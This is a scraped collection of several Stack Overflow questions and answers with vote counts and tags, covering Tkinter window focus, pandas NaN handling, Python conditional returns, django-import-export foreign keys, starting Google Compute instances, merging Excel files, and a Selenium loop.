is to make one Tkinter Window pop up overtop of other Tkinter windows. In my app I have a large window toplevel which calls a much smaller window top2 which initially appears on top of toplevel. If user clicks within toplevel window it gains focus and smothers much smaller top2 window until toplevel window is dragged off of it. The solution is to click the button in toplevel to launch top2 again. The top2 open function knows it is already running so simply lifts it to the top and gives it focus: def play_items(self): ''' Play 1 or more songs in listbox.selection(). Define buttons: Close, Pause, Prev, Next, Commercial and Intermission ''' if self.top2_is_active is True: self.top2.focus_force() # Get focus self.top2.lift() # Raise in stacking order root.update() return # Don't want to start playing again A: On macOS High Sierra, py3.6.4, here is my solution: def OnFocusIn(event): if type(event.widget).__name__ == 'Tk': event.widget.attributes('-topmost', False) # Create and configure your root ... root.attributes('-topmost', True) root.focus_force() root.bind('<FocusIn>', OnFocusIn) The idea is to bring it to the front until user interacts with it, i.e., taking focus. I tried the accepted answer, .after_idle(), and .after(). They all fail in one case: When I run my script directly from an IDE like PyCharm, the app window will stay behind. My solution works in all the cases that I encountered. A: This will lift the window to the front, and also focus on the window. def lift_window(window): window.attributes('-topmost',True) window.attributes('-topmost',False) # disable the topmost attribute after it is at the front to prevent permanent focus window.focus_force() # focus to the window A: One more line (needed for Python 3.11 and tkinter 8.6): def lift_window(window): window.attributes('-topmost', True) window.update_idletasks() # get window on top window.attributes('-topmost', False) # prevent permanent focus window.focus_force() # focus to the window
How to make a Tkinter window jump to the front?
How do I get a Tkinter application to jump to the front? Currently, the window appears behind all my other windows and doesn't get focus. Is there some method I should be calling?
[ "Assuming you mean your application windows when you say \"my other windows\", you can use the lift() method on a Toplevel or Tk:\nroot.lift()\n\nIf you want the window to stay above all other windows, use: \nroot.attributes(\"-topmost\", True)\n\nWhere root is your Toplevel or Tk. Don't forget the - infront of \"topmost\"!\nTo make it temporary, disable topmost right after:\ndef raise_above_all(window):\n window.attributes('-topmost', 1)\n window.attributes('-topmost', 0)\n\nJust pass in the window you want to raise as a argument, and this should work.\n", "Add the following lines before the mainloop():\nroot.lift()\nroot.attributes('-topmost',True)\nroot.after_idle(root.attributes,'-topmost',False)\n\nIt works perfectly for me. It makes the window come to the front when the window is generated, and it won't keep it always be in the front.\n", "If you're doing this on a Mac, use AppleEvents to give focus to Python. Eg:\nimport os\n\nos.system('''/usr/bin/osascript -e 'tell app \"Finder\" to set frontmost of process \"Python\" to true' ''')\n\n", "Regarding the Mac, I noticed there can be a problem in that if there are multiple python GUIs running, every process will be named \"Python\" and AppleScript will tend to promote the wrong one to the front. Here's my solution. The idea is to grab a list of running process IDs before and after you load Tkinter. (Note that these are AppleScript process IDs which seem to bear no relation to their posix counterparts. Go figure.) Then the odd man out will be yours and you move that one to frontmost. (I didn't think that loop at the end would be necessary, but if you simply get every process whose ID is procID, AppleScript apparently returns the one object identified by name, which of course is that non-unique \"Python\", so we are back to square one unless there's something I'm missing.)\nimport Tkinter, subprocess\ndef applescript(script):\n return subprocess.check_output(['/usr/bin/osascript', '-e', script])\ndef procidset():\n return set(applescript(\n 'tell app \"System Events\" to return id of every process whose name is \"Python\"'\n ).replace(',','').split())\nidset = procidset()\nroot = Tkinter.Tk()\nprocid = iter(procidset() - idset).next()\napplescript('''\n tell app \"System Events\"\n repeat with proc in every process whose name is \"Python\"\n if id of proc is ''' + procid + ''' then\n set frontmost of proc to true\n exit repeat\n end if\n end repeat\n end tell''')\n\n", "On Mac OS X PyObjC provides a cleaner and less error prone method than shelling out to osascript:\nimport os\nfrom Cocoa import NSRunningApplication, NSApplicationActivateIgnoringOtherApps\n\napp = NSRunningApplication.runningApplicationWithProcessIdentifier_(os.getpid())\napp.activateWithOptions_(NSApplicationActivateIgnoringOtherApps)\n\n", "Recently, I had the same question on the Mac. I have combined several answers using @MagerValp for the Mac and @D K for other systems:\nimport platform\n\nif platform.system() != 'Darwin':\n root.lift()\n root.call('wm', 'attributes', '.', '-topmost', True)\n root.after_idle(root.call, 'wm', 'attributes', '.', '-topmost', False)\nelse:\n import os\n from Cocoa import NSRunningApplication, NSApplicationActivateIgnoringOtherApps\n\n app = NSRunningApplication.runningApplicationWithProcessIdentifier_(os.getpid())\n app.activateWithOptions_(NSApplicationActivateIgnoringOtherApps)\n\nroot.mainloop()\n\n", "Somewhat of a combination of various other methods, this works on OS X 10.11, and Python 3.5.1 running in a venv, and should work on other platforms too. It also targets the app by process id rather than app name.\nfrom tkinter import Tk\nimport os\nimport subprocess\nimport platform\n\n\ndef raise_app(root: Tk):\n root.attributes(\"-topmost\", True)\n if platform.system() == 'Darwin':\n tmpl = 'tell application \"System Events\" to set frontmost of every process whose unix id is {} to true'\n script = tmpl.format(os.getpid())\n output = subprocess.check_call(['/usr/bin/osascript', '-e', script])\n root.after(0, lambda: root.attributes(\"-topmost\", False))\n\nYou call it right before the mainloop() call, like so:\nraise_app(root)\nroot.mainloop()\n\n", "There's a hint on how to make the Tkinter window take focus when you call mainloop() in the Tkinter._test() function.\n# The following three commands are needed so the window pops\n# up on top on Windows...\nroot.iconify()\nroot.update()\nroot.deiconify()\nroot.mainloop()\n\nThis is the cleanest most proper way I've found to do this, but it's only needed for Windows systems.\n", "This answer is to make one Tkinter Window pop up overtop of other Tkinter windows.\nIn my app I have a large window toplevel which calls a much smaller window top2 which initially appears on top of toplevel.\nIf user clicks within toplevel window it gains focus and smothers much smaller top2 window until toplevel window is dragged off of it.\nThe solution is to click the button in toplevel to launch top2 again. The top2 open function knows it is already running so simply lifts it to the top and gives it focus:\ndef play_items(self):\n ''' Play 1 or more songs in listbox.selection(). Define buttons:\n Close, Pause, Prev, Next, Commercial and Intermission\n '''\n\n if self.top2_is_active is True:\n self.top2.focus_force() # Get focus\n self.top2.lift() # Raise in stacking order\n root.update()\n return # Don't want to start playing again\n\n", "On macOS High Sierra, py3.6.4, here is my solution:\ndef OnFocusIn(event):\n if type(event.widget).__name__ == 'Tk':\n event.widget.attributes('-topmost', False)\n\n# Create and configure your root ...\n\nroot.attributes('-topmost', True)\nroot.focus_force()\nroot.bind('<FocusIn>', OnFocusIn)\n\nThe idea is to bring it to the front until user interacts with it, i.e., taking focus.\nI tried the accepted answer, .after_idle(), and .after(). They all fail in one case: When I run my script directly from an IDE like PyCharm, the app window will stay behind.\nMy solution works in all the cases that I encountered.\n", "This will lift the window to the front, and also focus on the window.\ndef lift_window(window):\n window.attributes('-topmost',True)\n window.attributes('-topmost',False) # disable the topmost attribute after it is at the front to prevent permanent focus \n window.focus_force() # focus to the window\n\n", "One more line (needed for Python 3.11 and tkinter 8.6):\ndef lift_window(window):\n window.attributes('-topmost', True)\n window.update_idletasks() # get window on top\n window.attributes('-topmost', False) # prevent permanent focus \n window.focus_force() # focus to the window\n\n" ]
[ 111, 46, 31, 6, 4, 4, 4, 3, 2, 1, 0, 0 ]
[]
[]
[ "focus", "python", "tkinter" ]
stackoverflow_0001892339_focus_python_tkinter.txt
Q: Pandas: replacing nan values conditionally within a group I have a dataframe with missing values. for each index in a column group, i want to replace these values seperately. If all of the values in a group are missing, i want to replace the values with 1. If only some of the values are missing, i want to replace it with data from an imputed dataframe dataframe 1 index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 NaN NaN 2 3 NaN 3 3 dataframe 2 (the imputed one) index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 2 2 2 3 2 3 3 output: index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 1 1 2 3 2 3 3 my data is much larger and the groups are larger as well. Ive been struggling now with this for days, i just cant seem to find a working solution my current solution is iterating over all the groups, and using groupby.transform to replace values, but i dont know how to tell the lambda function to take the values from my second data frame, and my current lambda function also doesnt replace all the values with 1 either, instead just returning the old groups with no changes df1 = pd.read_csv("file.txt", sep = "\t", index_col = "T: Protein.Group") def group(a: pd.DataFrame): a_grouped = a.groupby(["group"] , axis=1) return a_grouped def getgroup(a: pd.DataFrame): new_idx = pd.MultiIndex.from_arrays([ a.columns, a.columns.str.extract("(d\d+)_\d+", expand = False) ], names=["index", "group"]) a.columns = new_idx return a df1grp = group(getgroup(df1)) for i in list(df1grg.groups.keys()) df1grp.get_group(i).transform( lambda x: 1 if x.eq(np.nan).all() else x ) A: IIUC: df = df1.mask(df1.groupby('group', axis=1).count() == 0, 1) df = df.where(~df.isna(), df2) >>> df index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 1 1 2 3 2 3 3 This is assuming the columns are indeed a MultiIndex as you describe, e.g.: >>> df1.columns MultiIndex([('d0_1', 'd0'), ('d0_2', 'd0'), ('d1_1', 'd1'), ('d1_2', 'd1')], names=['index', 'group']) (I initially spent a few minutes making such columns as I thought you had simple Index columns and a first row with the 'group'...)
Pandas: replacing nan values conditionally within a group
I have a dataframe with missing values. for each index in a column group, i want to replace these values seperately. If all of the values in a group are missing, i want to replace the values with 1. If only some of the values are missing, i want to replace it with data from an imputed dataframe dataframe 1 index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 NaN NaN 2 3 NaN 3 3 dataframe 2 (the imputed one) index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 2 2 2 3 2 3 3 output: index d0_1 d0_2 d1_1 d1_2 group d0 d0 d1 d1 1 3 3 1 1 2 3 2 3 3 my data is much larger and the groups are larger as well. Ive been struggling now with this for days, i just cant seem to find a working solution my current solution is iterating over all the groups, and using groupby.transform to replace values, but i dont know how to tell the lambda function to take the values from my second data frame, and my current lambda function also doesnt replace all the values with 1 either, instead just returning the old groups with no changes df1 = pd.read_csv("file.txt", sep = "\t", index_col = "T: Protein.Group") def group(a: pd.DataFrame): a_grouped = a.groupby(["group"] , axis=1) return a_grouped def getgroup(a: pd.DataFrame): new_idx = pd.MultiIndex.from_arrays([ a.columns, a.columns.str.extract("(d\d+)_\d+", expand = False) ], names=["index", "group"]) a.columns = new_idx return a df1grp = group(getgroup(df1)) for i in list(df1grg.groups.keys()) df1grp.get_group(i).transform( lambda x: 1 if x.eq(np.nan).all() else x )
[ "IIUC:\ndf = df1.mask(df1.groupby('group', axis=1).count() == 0, 1)\ndf = df.where(~df.isna(), df2)\n\n>>> df\nindex d0_1 d0_2 d1_1 d1_2\ngroup d0 d0 d1 d1\n1 3 3 1 1\n2 3 2 3 3\n\nThis is assuming the columns are indeed a MultiIndex as you describe, e.g.:\n>>> df1.columns\nMultiIndex([('d0_1', 'd0'),\n ('d0_2', 'd0'),\n ('d1_1', 'd1'),\n ('d1_2', 'd1')],\n names=['index', 'group'])\n\n(I initially spent a few minutes making such columns as I thought you had simple Index columns and a first row with the 'group'...)\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074574058_dataframe_pandas_python.txt
Q: python: simplify return statement (trigraph?) Consider the following simple code: import re def my_match(s): if re.match("^[a-zA-Z]+", s): return True else: return False Is there a way to collapse this in a single return statement? In C we could do for example: return match("^[a-zA-Z]+", s) ? true : false; Is there something similar in python? A: A more generell solution would be to use the following code line. It excludes a fit with length 0 as it specificly checks for the None statement. In this case an empty string is impossible but it is more explicit. return re.match("^[a-zA-Z]+", s) is not None A: Python also supports this, although the syntaxes is a little different than most languages. import re def my_match(s): return True if re.match("^[a-zA-Z]+", s) else False In general, the Python syntax is val_when_true if cond else val_when_false, compared to the cond ? val_when_true : val_when_false you see in other languages. In your particular case though, you can just write: import re def my_match(s): return bool(re.match("^[a-zA-Z]+", s)) A: The other answers show the ternary equivalent in Python. But since Python also assigns truthiness to values and expressions, you could simply use: my_match = lambda s : bool(re.match("^[a-zA-Z]+", s)) A: re.match() returns a value that can be evaluated for truthiness. So if you don't need to return the exact values True and False, you can just directly return the result of the match() function: def my_match(s): return re.match("^[a-zA-Z]+", s) And then the caller can say: if my_match(x): ... else: ... Although in this specific case, my_match() becomes a mostly useless wrapper function, and you could just call re.match(...) directly. if re.match(...): ... else: ...
python: simplify return statement (trigraph?)
Consider the following simple code: import re def my_match(s): if re.match("^[a-zA-Z]+", s): return True else: return False Is there a way to collapse this in a single return statement? In C we could do for example: return match("^[a-zA-Z]+", s) ? true : false; Is there something similar in python?
[ "A more generell solution would be to use the following code line. It excludes a fit with length 0 as it specificly checks for the None statement. In this case an empty string is impossible but it is more explicit.\nreturn re.match(\"^[a-zA-Z]+\", s) is not None\n\n", "Python also supports this, although the syntaxes is a little different than most languages.\nimport re\n\ndef my_match(s):\n return True if re.match(\"^[a-zA-Z]+\", s) else False\n\nIn general, the Python syntax is val_when_true if cond else val_when_false, compared to the cond ? val_when_true : val_when_false you see in other languages.\nIn your particular case though, you can just write:\nimport re\n\ndef my_match(s):\n return bool(re.match(\"^[a-zA-Z]+\", s))\n\n", "The other answers show the ternary equivalent in Python. But since Python also assigns truthiness to values and expressions, you could simply use:\nmy_match = lambda s : bool(re.match(\"^[a-zA-Z]+\", s))\n\n", "re.match() returns a value that can be evaluated for truthiness. So if you don't need to return the exact values True and False, you can just directly return the result of the match() function:\ndef my_match(s):\n return re.match(\"^[a-zA-Z]+\", s)\n\nAnd then the caller can say:\nif my_match(x):\n ...\nelse:\n ...\n\nAlthough in this specific case, my_match() becomes a mostly useless wrapper function, and you could just call re.match(...) directly.\nif re.match(...):\n ...\nelse:\n ...\n\n" ]
[ 1, 1, 0, 0 ]
[]
[]
[ "python", "python_3.x" ]
stackoverflow_0074575794_python_python_3.x.txt
Q: Import into tables from Django import_export I am struggling to populate models in Django by using ForeignKey. Let's say we have as in import_export documentation the following example: class Author(models.Model): id = models.BigAutoField(primary_key=True) name = models.CharField(max_length=100) def __str__(self): return self.name class Category(models.Model): id = models.BigAutoField(primary_key=True) name = models.CharField(max_length=100) def __str__(self): return self.name class Book(models.Model): name = models.CharField('Book name', max_length=100) author = models.ForeignKey(Author, blank=True, null=True, ) ... price = models.DecimalField(max_digits=10, decimal_places=2, null=True, blank=True) categories = models.ManyToManyField(Category, blank=True) def __str__(self): return self.name How can I implement import_export module that can check if there is an existing author by name (not by id), that is not case sensitive, and that can generate a new author if it does not exist? As an example, let's say the CSV file looks like: name,author,...,price,categories J.R.R. Tolkien,Lord of the Rings,...,40,["cat1","cat2"] Also, if there is a DateTime field, how to generate that in ForeignKey table? NOTE: I know about use of natural key: from import_export.fields import Field from import_export.widgets import ForeignKeyWidget class AuthorManager(models.Manager): def get_by_natural_key(self, name): return self.get(name=name) class Author(models.Model): objects = AuthorManager() name = models.CharField(max_length=100) birthday = models.DateTimeField(auto_now_add=True) def natural_key(self): return (self.name,) # Only the author field uses natural foreign keys. class BookResource(resources.ModelResource): author = Field( column_name = "author", attribute = "author", widget = ForeignKeyWidget(Author, use_natural_foreign_keys=True) ) class Meta: model = Book But I am not sure how to check for UPPER or lower case in the CSV. And how to generate a new Author if it does not exist. A: There are a couple of ways of creating an FK relation during import if it does not already exist. Option 1 - override the before_import_row() method class BookResource(resources.ModelResource): # note use of 'iexact' for case-insensitive lookup def before_import_row(self, row, **kwargs): author_name = row["author"] Author.objects.get_or_create(name__iexact=author_name, defaults={"name": author_name}) # other code omitted Option 2 - subclass ForeignKeyWidget Simply subclass ForeignKeyWidget and implement the check in clean(): class AuthorForeignKeyWidget(widgets.ForeignKeyWidget): def clean(self, value, row=None, **kwargs): author, created = Author.objects.get_or_create(name__iexact=value, defaults={"name": value}) return author class BookResource(resources.ModelResource): author = fields.Field( column_name='author', attribute='author', widget=AuthorForeignKeyWidget(Author)) # other code omitted Either way will work fine. I would personally use option 2. Also, if there is a DateTime field, how to generate that in ForeignKey table? Since you are calling Author.objects.get_or_create() you can add a date if you wish, for example: author, created = Author.objects.get_or_create(name__iexact=value, defaults={"name": value, "created": timezone.now()}) If using natural keys you can adjust the code as desired. Related answer about creating in bulk mode
Import into tables from Django import_export
I am struggling to populate models in Django by using ForeignKey. Let's say we have as in import_export documentation the following example: class Author(models.Model): id = models.BigAutoField(primary_key=True) name = models.CharField(max_length=100) def __str__(self): return self.name class Category(models.Model): id = models.BigAutoField(primary_key=True) name = models.CharField(max_length=100) def __str__(self): return self.name class Book(models.Model): name = models.CharField('Book name', max_length=100) author = models.ForeignKey(Author, blank=True, null=True, ) ... price = models.DecimalField(max_digits=10, decimal_places=2, null=True, blank=True) categories = models.ManyToManyField(Category, blank=True) def __str__(self): return self.name How can I implement import_export module that can check if there is an existing author by name (not by id), that is not case sensitive, and that can generate a new author if it does not exist? As an example, let's say the CSV file looks like: name,author,...,price,categories J.R.R. Tolkien,Lord of the Rings,...,40,["cat1","cat2"] Also, if there is a DateTime field, how to generate that in ForeignKey table? NOTE: I know about use of natural key: from import_export.fields import Field from import_export.widgets import ForeignKeyWidget class AuthorManager(models.Manager): def get_by_natural_key(self, name): return self.get(name=name) class Author(models.Model): objects = AuthorManager() name = models.CharField(max_length=100) birthday = models.DateTimeField(auto_now_add=True) def natural_key(self): return (self.name,) # Only the author field uses natural foreign keys. class BookResource(resources.ModelResource): author = Field( column_name = "author", attribute = "author", widget = ForeignKeyWidget(Author, use_natural_foreign_keys=True) ) class Meta: model = Book But I am not sure how to check for UPPER or lower case in the CSV. And how to generate a new Author if it does not exist.
[ "There are a couple of ways of creating an FK relation during import if it does not already exist.\nOption 1 - override the before_import_row() method\nclass BookResource(resources.ModelResource):\n\n # note use of 'iexact' for case-insensitive lookup\n def before_import_row(self, row, **kwargs):\n author_name = row[\"author\"]\n Author.objects.get_or_create(name__iexact=author_name, \n defaults={\"name\": author_name})\n\n # other code omitted\n\nOption 2 - subclass ForeignKeyWidget\nSimply subclass ForeignKeyWidget and implement the check in clean():\nclass AuthorForeignKeyWidget(widgets.ForeignKeyWidget):\n\n def clean(self, value, row=None, **kwargs):\n author, created = Author.objects.get_or_create(name__iexact=value,\n defaults={\"name\": value})\n return author\n\n\nclass BookResource(resources.ModelResource):\n author = fields.Field(\n column_name='author',\n attribute='author',\n widget=AuthorForeignKeyWidget(Author))\n\n # other code omitted\n\nEither way will work fine. I would personally use option 2.\n\nAlso, if there is a DateTime field, how to generate that in ForeignKey table?\n\nSince you are calling Author.objects.get_or_create() you can add a date if you wish, for example:\nauthor, created = Author.objects.get_or_create(name__iexact=value, \n defaults={\"name\": value, \"created\": timezone.now()})\n\nIf using natural keys you can adjust the code as desired.\nRelated answer about creating in bulk mode\n" ]
[ 1 ]
[]
[]
[ "django", "django_import_export", "python" ]
stackoverflow_0074562802_django_django_import_export_python.txt
Q: Starting a Google Compute instance with Python I am trying to start a Google Compute instance with the Google API Python Client Library. This is so that a cheap instance (running on a single core) can periodically start and stop a more expensive instance (with many cores) periodically, to keep costs down. I have successfully installed the different components and run Google's example script create_instance.py (which creates an instances, runs a startup script, and deletes the instance). Inspecting the PyDoc reference for the Compute Engine API, and cross-referencing how the other instances() functions work in the create_instance.py example, I would expect the start instance command to be: python compute.instances().start(project=*, zone=*, instance=*).execute() The above command gives me the error "An expression was expected after '('. at line:1 char:34" - this is the first parenthesis. a. What have I done wrong? b. Is using the Google API with Python a good way to start instances from other instances, programmatically? A: Below is the code needed to start a compute engine instance from googleapiclient import discovery service = discovery.build('compute', 'v1') print('VM Instance starting') # Project ID for this request. project = 'project_name' # The name of the zone for this request. zone = 'zone_value' # Name of the instance resource to start. instance = 'instance_name' request = service.instances().start(project=project, zone=zone, instance=instance) response = request.execute() print('VM Instance started') This is the code I used for starting my VM instance from a cloud function. An important thing to note here is that this can only start an instance if the instance is in stopped state, which suits my requirements perfectly. A: Generally I would expect you would need to import the api library with an import statement or perhaps a runtime flag (-m somemodule?). Running a line of python directly from the command line is usually not the best way to proceed. Instead Google provides the gcloud command line tool. An authentication/login function is usually called before sending the API actual commands. On a Google VM, this can be either an id/private key or a blank id/key if the VM is specifically authorized to call the API or act as a specific account. This authorization can be set up from the compute engine web control panel when creating a Google VM the first time. On an external VM, it will need an id/private key to supply to the Google API. So, a one liner in python probably won't work as it is missing this step. The compute.instances().start() function takes required parameters to start a specific instance that has stopped. That means: the VM instance has been created previously the VM instance is in the stopped state the instance to be restarted is identified by a specific project id, a (geo) zone, and an instance name that is supplied in the call to start From Google Cloud Python Documentation start(project=, zone=, instance=*) Starts an instance that was stopped using the instances().stop method. For more information, see Restart an instance. Args: project: string, Project ID for this request. (required) zone: string, The name of the zone for this request. (required) instance: string, Name of the instance resource to start. (required) ... A: from google.cloud import compute_v1 project = "" zone = "" instance_client = compute_v1.InstancesClient.from_service_account_file("ServiceAccount.json") instance_list = instance_client.list(project=project, zone=zone) for instance in instance_list: print(instance.name) instance_client.start(project=project, zone=zone, instance=instance.name) Requires iam role Compute Admin Source available here: https://github.com/googleapis/python-compute
Starting a Google Compute instance with Python
I am trying to start a Google Compute instance with the Google API Python Client Library. This is so that a cheap instance (running on a single core) can periodically start and stop a more expensive instance (with many cores) periodically, to keep costs down. I have successfully installed the different components and run Google's example script create_instance.py (which creates an instances, runs a startup script, and deletes the instance). Inspecting the PyDoc reference for the Compute Engine API, and cross-referencing how the other instances() functions work in the create_instance.py example, I would expect the start instance command to be: python compute.instances().start(project=*, zone=*, instance=*).execute() The above command gives me the error "An expression was expected after '('. at line:1 char:34" - this is the first parenthesis. a. What have I done wrong? b. Is using the Google API with Python a good way to start instances from other instances, programmatically?
[ "Below is the code needed to start a compute engine instance\nfrom googleapiclient import discovery\n\nservice = discovery.build('compute', 'v1')\nprint('VM Instance starting')\n\n# Project ID for this request.\nproject = 'project_name' \n\n# The name of the zone for this request.\nzone = 'zone_value' \n\n# Name of the instance resource to start.\ninstance = 'instance_name'\n\nrequest = service.instances().start(project=project, zone=zone, instance=instance)\nresponse = request.execute()\n\nprint('VM Instance started')\n\nThis is the code I used for starting my VM instance from a cloud function. \nAn important thing to note here is that this can only start an instance if the instance is in stopped state, which suits my requirements perfectly.\n", "\nGenerally I would expect you would need to import the api library with an import statement or perhaps a runtime flag (-m somemodule?). Running a line of python directly from the command line is usually not the best way to proceed. Instead Google provides the gcloud command line tool.\nAn authentication/login function is usually called before sending the API actual commands. On a Google VM, this can be either an id/private key or a blank id/key if the VM is specifically authorized to call the API or act as a specific account. This authorization can be set up from the compute engine web control panel when creating a Google VM the first time. On an external VM, it will need an id/private key to supply to the Google API. So, a one liner in python probably won't work as it is missing this step. \nThe compute.instances().start() function takes required parameters to start a specific instance that has stopped. That means:\n\nthe VM instance has been created previously\nthe VM instance is in the stopped state\nthe instance to be restarted is identified by a specific project id, a (geo) zone, and an instance name that is supplied in the call to start\n\n\nFrom Google Cloud Python Documentation\n\nstart(project=, zone=, instance=*) Starts an instance that was\n stopped using the instances().stop method. For more\n information, see Restart an instance.\nArgs: project: string, Project ID for this request. (required)\n zone: string, The name of the zone for this request. (required)\n instance: string, Name of the instance resource to start. (required)\n...\n\n", "from google.cloud import compute_v1\n\nproject = \"\"\nzone = \"\"\ninstance_client = compute_v1.InstancesClient.from_service_account_file(\"ServiceAccount.json\")\ninstance_list = instance_client.list(project=project, zone=zone)\nfor instance in instance_list:\n print(instance.name)\n instance_client.start(project=project, zone=zone, instance=instance.name)\n\nRequires iam role Compute Admin\nSource available here: https://github.com/googleapis/python-compute\n" ]
[ 5, 3, 0 ]
[ "I used the code shared by @user570778, and for me it worked fine.\n`from googleapiclient import discovery\nservice = discovery.build('compute', 'v1')\nprint('VM Instance starting')\nProject ID for this request.\nproject = 'project_name'\nThe name of the zone for this request.\nzone = 'zone_value'\nName of the instance resource to start.\ninstance = 'instance_name'\nrequest = service.instances().start(project=project, zone=zone, instance=instance)\nresponse = request.execute()\nprint('VM Instance started')\n`\nI'm wondering, is it possible to start multiples instance in the same function?\n" ]
[ -2 ]
[ "google_api_python_client", "google_compute_engine", "python" ]
stackoverflow_0045207202_google_api_python_client_google_compute_engine_python.txt
Q: Importing multiple excel files and combining into dataframe I am trying to import many excel files (around 400) into one dataframe from a folder but I seem to be running into an error. The files I want from my folder are names filename followed by a date - "filename_yyyy_mm_dd.xlsx". I want to keep the header as the files have all same columns for different dates. My current code is: import glob import pandas as pd import os path = r"C:\Users\..." my_files = glob.glob(os.path.join(path, "filename*.xlsx")) file_li = [] for filename in my_files: df = pd.read_excel(filename, index_col=None, header=1) file_li.append(df) frame = pd.concat(file_li, axis=0, ignore_index=True) When I call my frame I dont get any response? Am I doing something wrong in the way I am calling the file name? Update: My excel files look like this: Column 1 Column 2 Column 3 Column 4 Column 5 Column 6 Column 7 Column 8 Column 9 Column 10 Column 11 Column 12 Column 13 Column 14 Date SREC-MD SREC Feb-25 MDX F 85 0 0 8086 02/25/2025 20107 with around 300-400 rows. My output has captured the 14 columns but it has added a lot more as doing frame.info() shows I have 922 columns. Update 2: A: Instead of using concat, you could try reading the files into a df and then append them to one combined csv using mode='a'. Then read the combined csv. for filename in my_files: df = pd.read_excel(filename, index_col=None, header=1) df.to_csv('combined.csv', mode='a', header=False) df = pd.read_csv('combined.csv') A: It's hard to tell why you're getting the extra columns but you can try this : import glob import pandas as pd import os path = r"C:\Users\..." my_files = glob.glob(os.path.join(path, "filename*.xlsx")) file_li = [] for filename in my_files: df = pd.read_excel(filename, index_col=None, header=None) file_li.append(df) frame = ( pd.concat(file_li, axis=0, ignore_index=True) .dropna(how="all") #to get rid of the eventual extra rows abobe each header .drop_duplicates() #to get rid of the cumulated duplicated headers .T.set_index(0).T #to make the first row as header of the dataframe ) I suggest you however to check if there is any missing rows in frame compared to your spreadsheets.
Importing multiple excel files and combining into dataframe
I am trying to import many excel files (around 400) into one dataframe from a folder but I seem to be running into an error. The files I want from my folder are names filename followed by a date - "filename_yyyy_mm_dd.xlsx". I want to keep the header as the files have all same columns for different dates. My current code is: import glob import pandas as pd import os path = r"C:\Users\..." my_files = glob.glob(os.path.join(path, "filename*.xlsx")) file_li = [] for filename in my_files: df = pd.read_excel(filename, index_col=None, header=1) file_li.append(df) frame = pd.concat(file_li, axis=0, ignore_index=True) When I call my frame I dont get any response? Am I doing something wrong in the way I am calling the file name? Update: My excel files look like this: Column 1 Column 2 Column 3 Column 4 Column 5 Column 6 Column 7 Column 8 Column 9 Column 10 Column 11 Column 12 Column 13 Column 14 Date SREC-MD SREC Feb-25 MDX F 85 0 0 8086 02/25/2025 20107 with around 300-400 rows. My output has captured the 14 columns but it has added a lot more as doing frame.info() shows I have 922 columns. Update 2:
[ "Instead of using concat, you could try reading the files into a df and then append them to one combined csv using mode='a'. Then read the combined csv.\nfor filename in my_files:\n df = pd.read_excel(filename, index_col=None, header=1)\n df.to_csv('combined.csv', mode='a', header=False)\n\n\ndf = pd.read_csv('combined.csv')\n\n", "It's hard to tell why you're getting the extra columns but you can try this :\nimport glob\nimport pandas as pd\nimport os\n\n\npath = r\"C:\\Users\\...\"\n\nmy_files = glob.glob(os.path.join(path, \"filename*.xlsx\"))\n\nfile_li = []\n\nfor filename in my_files:\n df = pd.read_excel(filename, index_col=None, header=None)\n file_li.append(df)\n \nframe = (\n pd.concat(file_li, axis=0, ignore_index=True)\n .dropna(how=\"all\") #to get rid of the eventual extra rows abobe each header\n .drop_duplicates() #to get rid of the cumulated duplicated headers\n .T.set_index(0).T #to make the first row as header of the dataframe\n )\n\nI suggest you however to check if there is any missing rows in frame compared to your spreadsheets.\n" ]
[ 0, 0 ]
[]
[]
[ "excel", "pandas", "python" ]
stackoverflow_0074574921_excel_pandas_python.txt
Q: Python loops, need some advice i trying to create a small program usign python and i need some help about python loops. this small program will automates a fairly boring repetitive task. I use module : selenium, time and pyautogui here is the piece of code that i want to repeat until it no longer finds a certain element on the web page : btnOptions = driver.find_element(By.XPATH, "/html/body/div[1]/div/div[1]/div/div[5]/div/div/div[3]/div/div/div[1]/div[1]/div/div/div[4]/div[2]/div/div[2]/div[3]/div[1]/div/div/div/div/div/div/div/div/div/div/div[8]/div/div[2]/div/div[3]/div/div") btnOptions.click() time.sleep(1) pyautogui.press("down", presses=10) pyautogui.press("enter") time.sleep(1) btn_move = driver.find_element(By.XPATH, "/html/body/div[1]/div/div[1]/div/div[6]/div/div/div[1]/div/div[2]/div/div/div/div/div/div/div[3]/div/div/div/div[1]") btn_move.click() as long as the btn_option is found, the program must continue otherwise it must stop. I can't find a solution, if anyone can help me it would be very appreciated. thanks a lot i tried several loops but every time i get an error of course, I'm just new to coding in python :/ A: I've done a similar task. You may try this: while True: try: btnOptions = driver.find_element(By.XPATH, "/html/body/div[1]/div/div[1]/div/div[5]/div/div/div[3]/div/div/div[1]/div[1]/div/div/div[4]/div[2]/div/div[2]/div[3]/div[1]/div/div/div/div/div/div/div/div/div/div/div[8]/div/div[2]/div/div[3]/div/div") btnOptions.click() time.sleep(1) pyautogui.press("down", presses=10) pyautogui.press("enter") time.sleep(1) btn_move = driver.find_element(By.XPATH, "/html/body/div[1]/div/div[1]/div/div[6]/div/div/div[1]/div/div[2]/div/div/div/div/div/div/div[3]/div/div/div/div[1]") btn_move.click() except NoSuchElementException: break
Python loops, need some advice
i trying to create a small program usign python and i need some help about python loops. this small program will automates a fairly boring repetitive task. I use module : selenium, time and pyautogui here is the piece of code that i want to repeat until it no longer finds a certain element on the web page : btnOptions = driver.find_element(By.XPATH, "/html/body/div[1]/div/div[1]/div/div[5]/div/div/div[3]/div/div/div[1]/div[1]/div/div/div[4]/div[2]/div/div[2]/div[3]/div[1]/div/div/div/div/div/div/div/div/div/div/div[8]/div/div[2]/div/div[3]/div/div") btnOptions.click() time.sleep(1) pyautogui.press("down", presses=10) pyautogui.press("enter") time.sleep(1) btn_move = driver.find_element(By.XPATH, "/html/body/div[1]/div/div[1]/div/div[6]/div/div/div[1]/div/div[2]/div/div/div/div/div/div/div[3]/div/div/div/div[1]") btn_move.click() as long as the btn_option is found, the program must continue otherwise it must stop. I can't find a solution, if anyone can help me it would be very appreciated. thanks a lot i tried several loops but every time i get an error of course, I'm just new to coding in python :/
